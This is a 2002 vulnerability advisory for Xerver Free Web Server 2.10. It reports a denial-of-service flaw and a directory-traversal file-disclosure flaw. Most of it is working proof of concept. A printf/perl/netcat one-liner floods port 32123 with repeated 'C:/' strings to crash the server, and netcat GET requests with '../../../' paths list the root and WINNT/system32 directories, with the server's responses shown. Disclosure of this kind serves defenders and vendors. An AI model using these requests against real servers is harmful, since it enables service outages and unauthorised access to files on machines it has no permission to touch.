------oOo------ Xerver Free Web Server 2.10 file Disclosure & DoS (Denial of Service Attack). ------oOo------ Company Affected: www.JavaScript.nu Version: v2.10 Date Added: 02-27-02 Size: 287 KB OS Affected: : Windows ALL, Linux ALL, BSD all, Solaris ALL, MAC ALL. Author: ** Alex Hernandez <al3xhernandez@ureach.com> ** Thanks all the people from Spain and Argentina. ** Special Greets: White-B, Pablo S0r, Paco Spain, G.Maggiotti. Also a greet to "KF" <dotslash@snosoft.com> http://www.snosoft.com for invitme to participate for more research about the Bugs, Exploits and Vulnerabilities :-) thanks friend, u have publish exelents bugs :X ----=[Brief Description]=------------ Xerver Free Web Server is a tiny web server allowing you to run CGI/perl scripts on your computer. Xerver includes features such as: Allow/forbid directory listing, create your own error pages ("404 File Not Found"), allow/deny CGI-scripts, choose your own index file extensions, share/unshare hidden files or files with certain file extensions, share unlimited folders etc. Xerver is a tiny, fast and free web server, but is still advanced and supports both HTTP/1.1 and HTTP/1.0 and all HTTP methods (GET, POST and HEAD)."Run CGI/perl scripts on your computer. ----=[Summary]=---------------------- Exist two vulnerabilities: The port 32123 usually is configuration of the server , exist a one metod for crass this system calling the drive C:\ several times, another bug exists on server remote any user can see all the files configuration on the system also even though one has formed the services to deny the folders or files any user can access via remote to 80 port finding the configuration of the own server. ------oOo------ Proof of concept DoS http://localhost:32123 $ printf "GET /`perl -e 'print "C:/"x500000'`\r\n\r\n" |nc -vvn 127.0.0.1 32123 Explotation: Example 1: $ nc -vvn 127.0.0.1 80 (UNKNOWN) [127.0.0.1] 80 (?) open GET /unix/ALEX/Xerver2.10/../../../ HTTP/1.0 HTTP/1.1 200 OK Date: March 6, 2002 8:52:51 PM CST Server: Xerver_v2 Connection: close Location: / Content-Type: text/html <HTML><HEAD><TITLE>Directory Listing for /</TITLE></HEAD><BODY BGCOLOR=white COL OR=black><FONT FACE="tahoma, arial, verdana"><H2>Directory Listing for /</H2></F ONT><PRE> <B>File name File size&nb sp; Last modified</B> Program Files ---------------------------------------------------------------- ---------------- <A HREF="Program Files" STYLE="text-decoration: none;"><IMG SRC="/Image:showFold er" BORDER=0> Program Files</A> ---------------------------------------------------------------- ---------------- RECYCLER ---------------------------------------------------------------- ---------------- <A HREF="RECYCLER" STYLE="text-decoration: none;"><IMG SRC="/Image:showFolder" B ORDER=0> RECYCLER</A> ---------------------------------------------------------------- ---------------- WINNT ---------------------------------------------------------------- ---------------- <A HREF="WINNT" STYLE="text-decoration: none;"><IMG SRC="/Image:showFolder" BORD ER=0> WINNT</A> ---------------------------------------------------------------- --------------- [...] or via web: http://localhost/unix/ALEX/Xerver2.10/../../../ Directory Listing for / File name File size Last modified $unix ALEX Documents and Settings My Downloads Program Files RECYCLER [...] Example 2: $ nc -vvn 127.0.0.1 80 (UNKNOWN) [127.0.0.1] 80 (?) open GET /unix/ALEX/Xerver2.10/../../../WINNT/system32/ HTTP 1.0 The results is: Directory Listing for /WINNT/system32/ File name File size Last modified ../ AdCache CatRoot Com DTCLog DirectX GroupPolicy Hummbird IOSUBSYS Macromed Microsoft [...] ------oOo------------------------------------ Vendor Response: The vendor was notified "Omid Rouhani" webmaster@javascript.nu htttp://www.JavaScript.nu Patch Temporary: Restricted files and Directories Alex Hernandez <al3xhernandez@ureach.com> (c) 2002. ------oOo------------------------------------ ________________________________________________ Get your own "800" number Voicemail, fax, email, and a lot more http://www.ureach.com/reg/tag
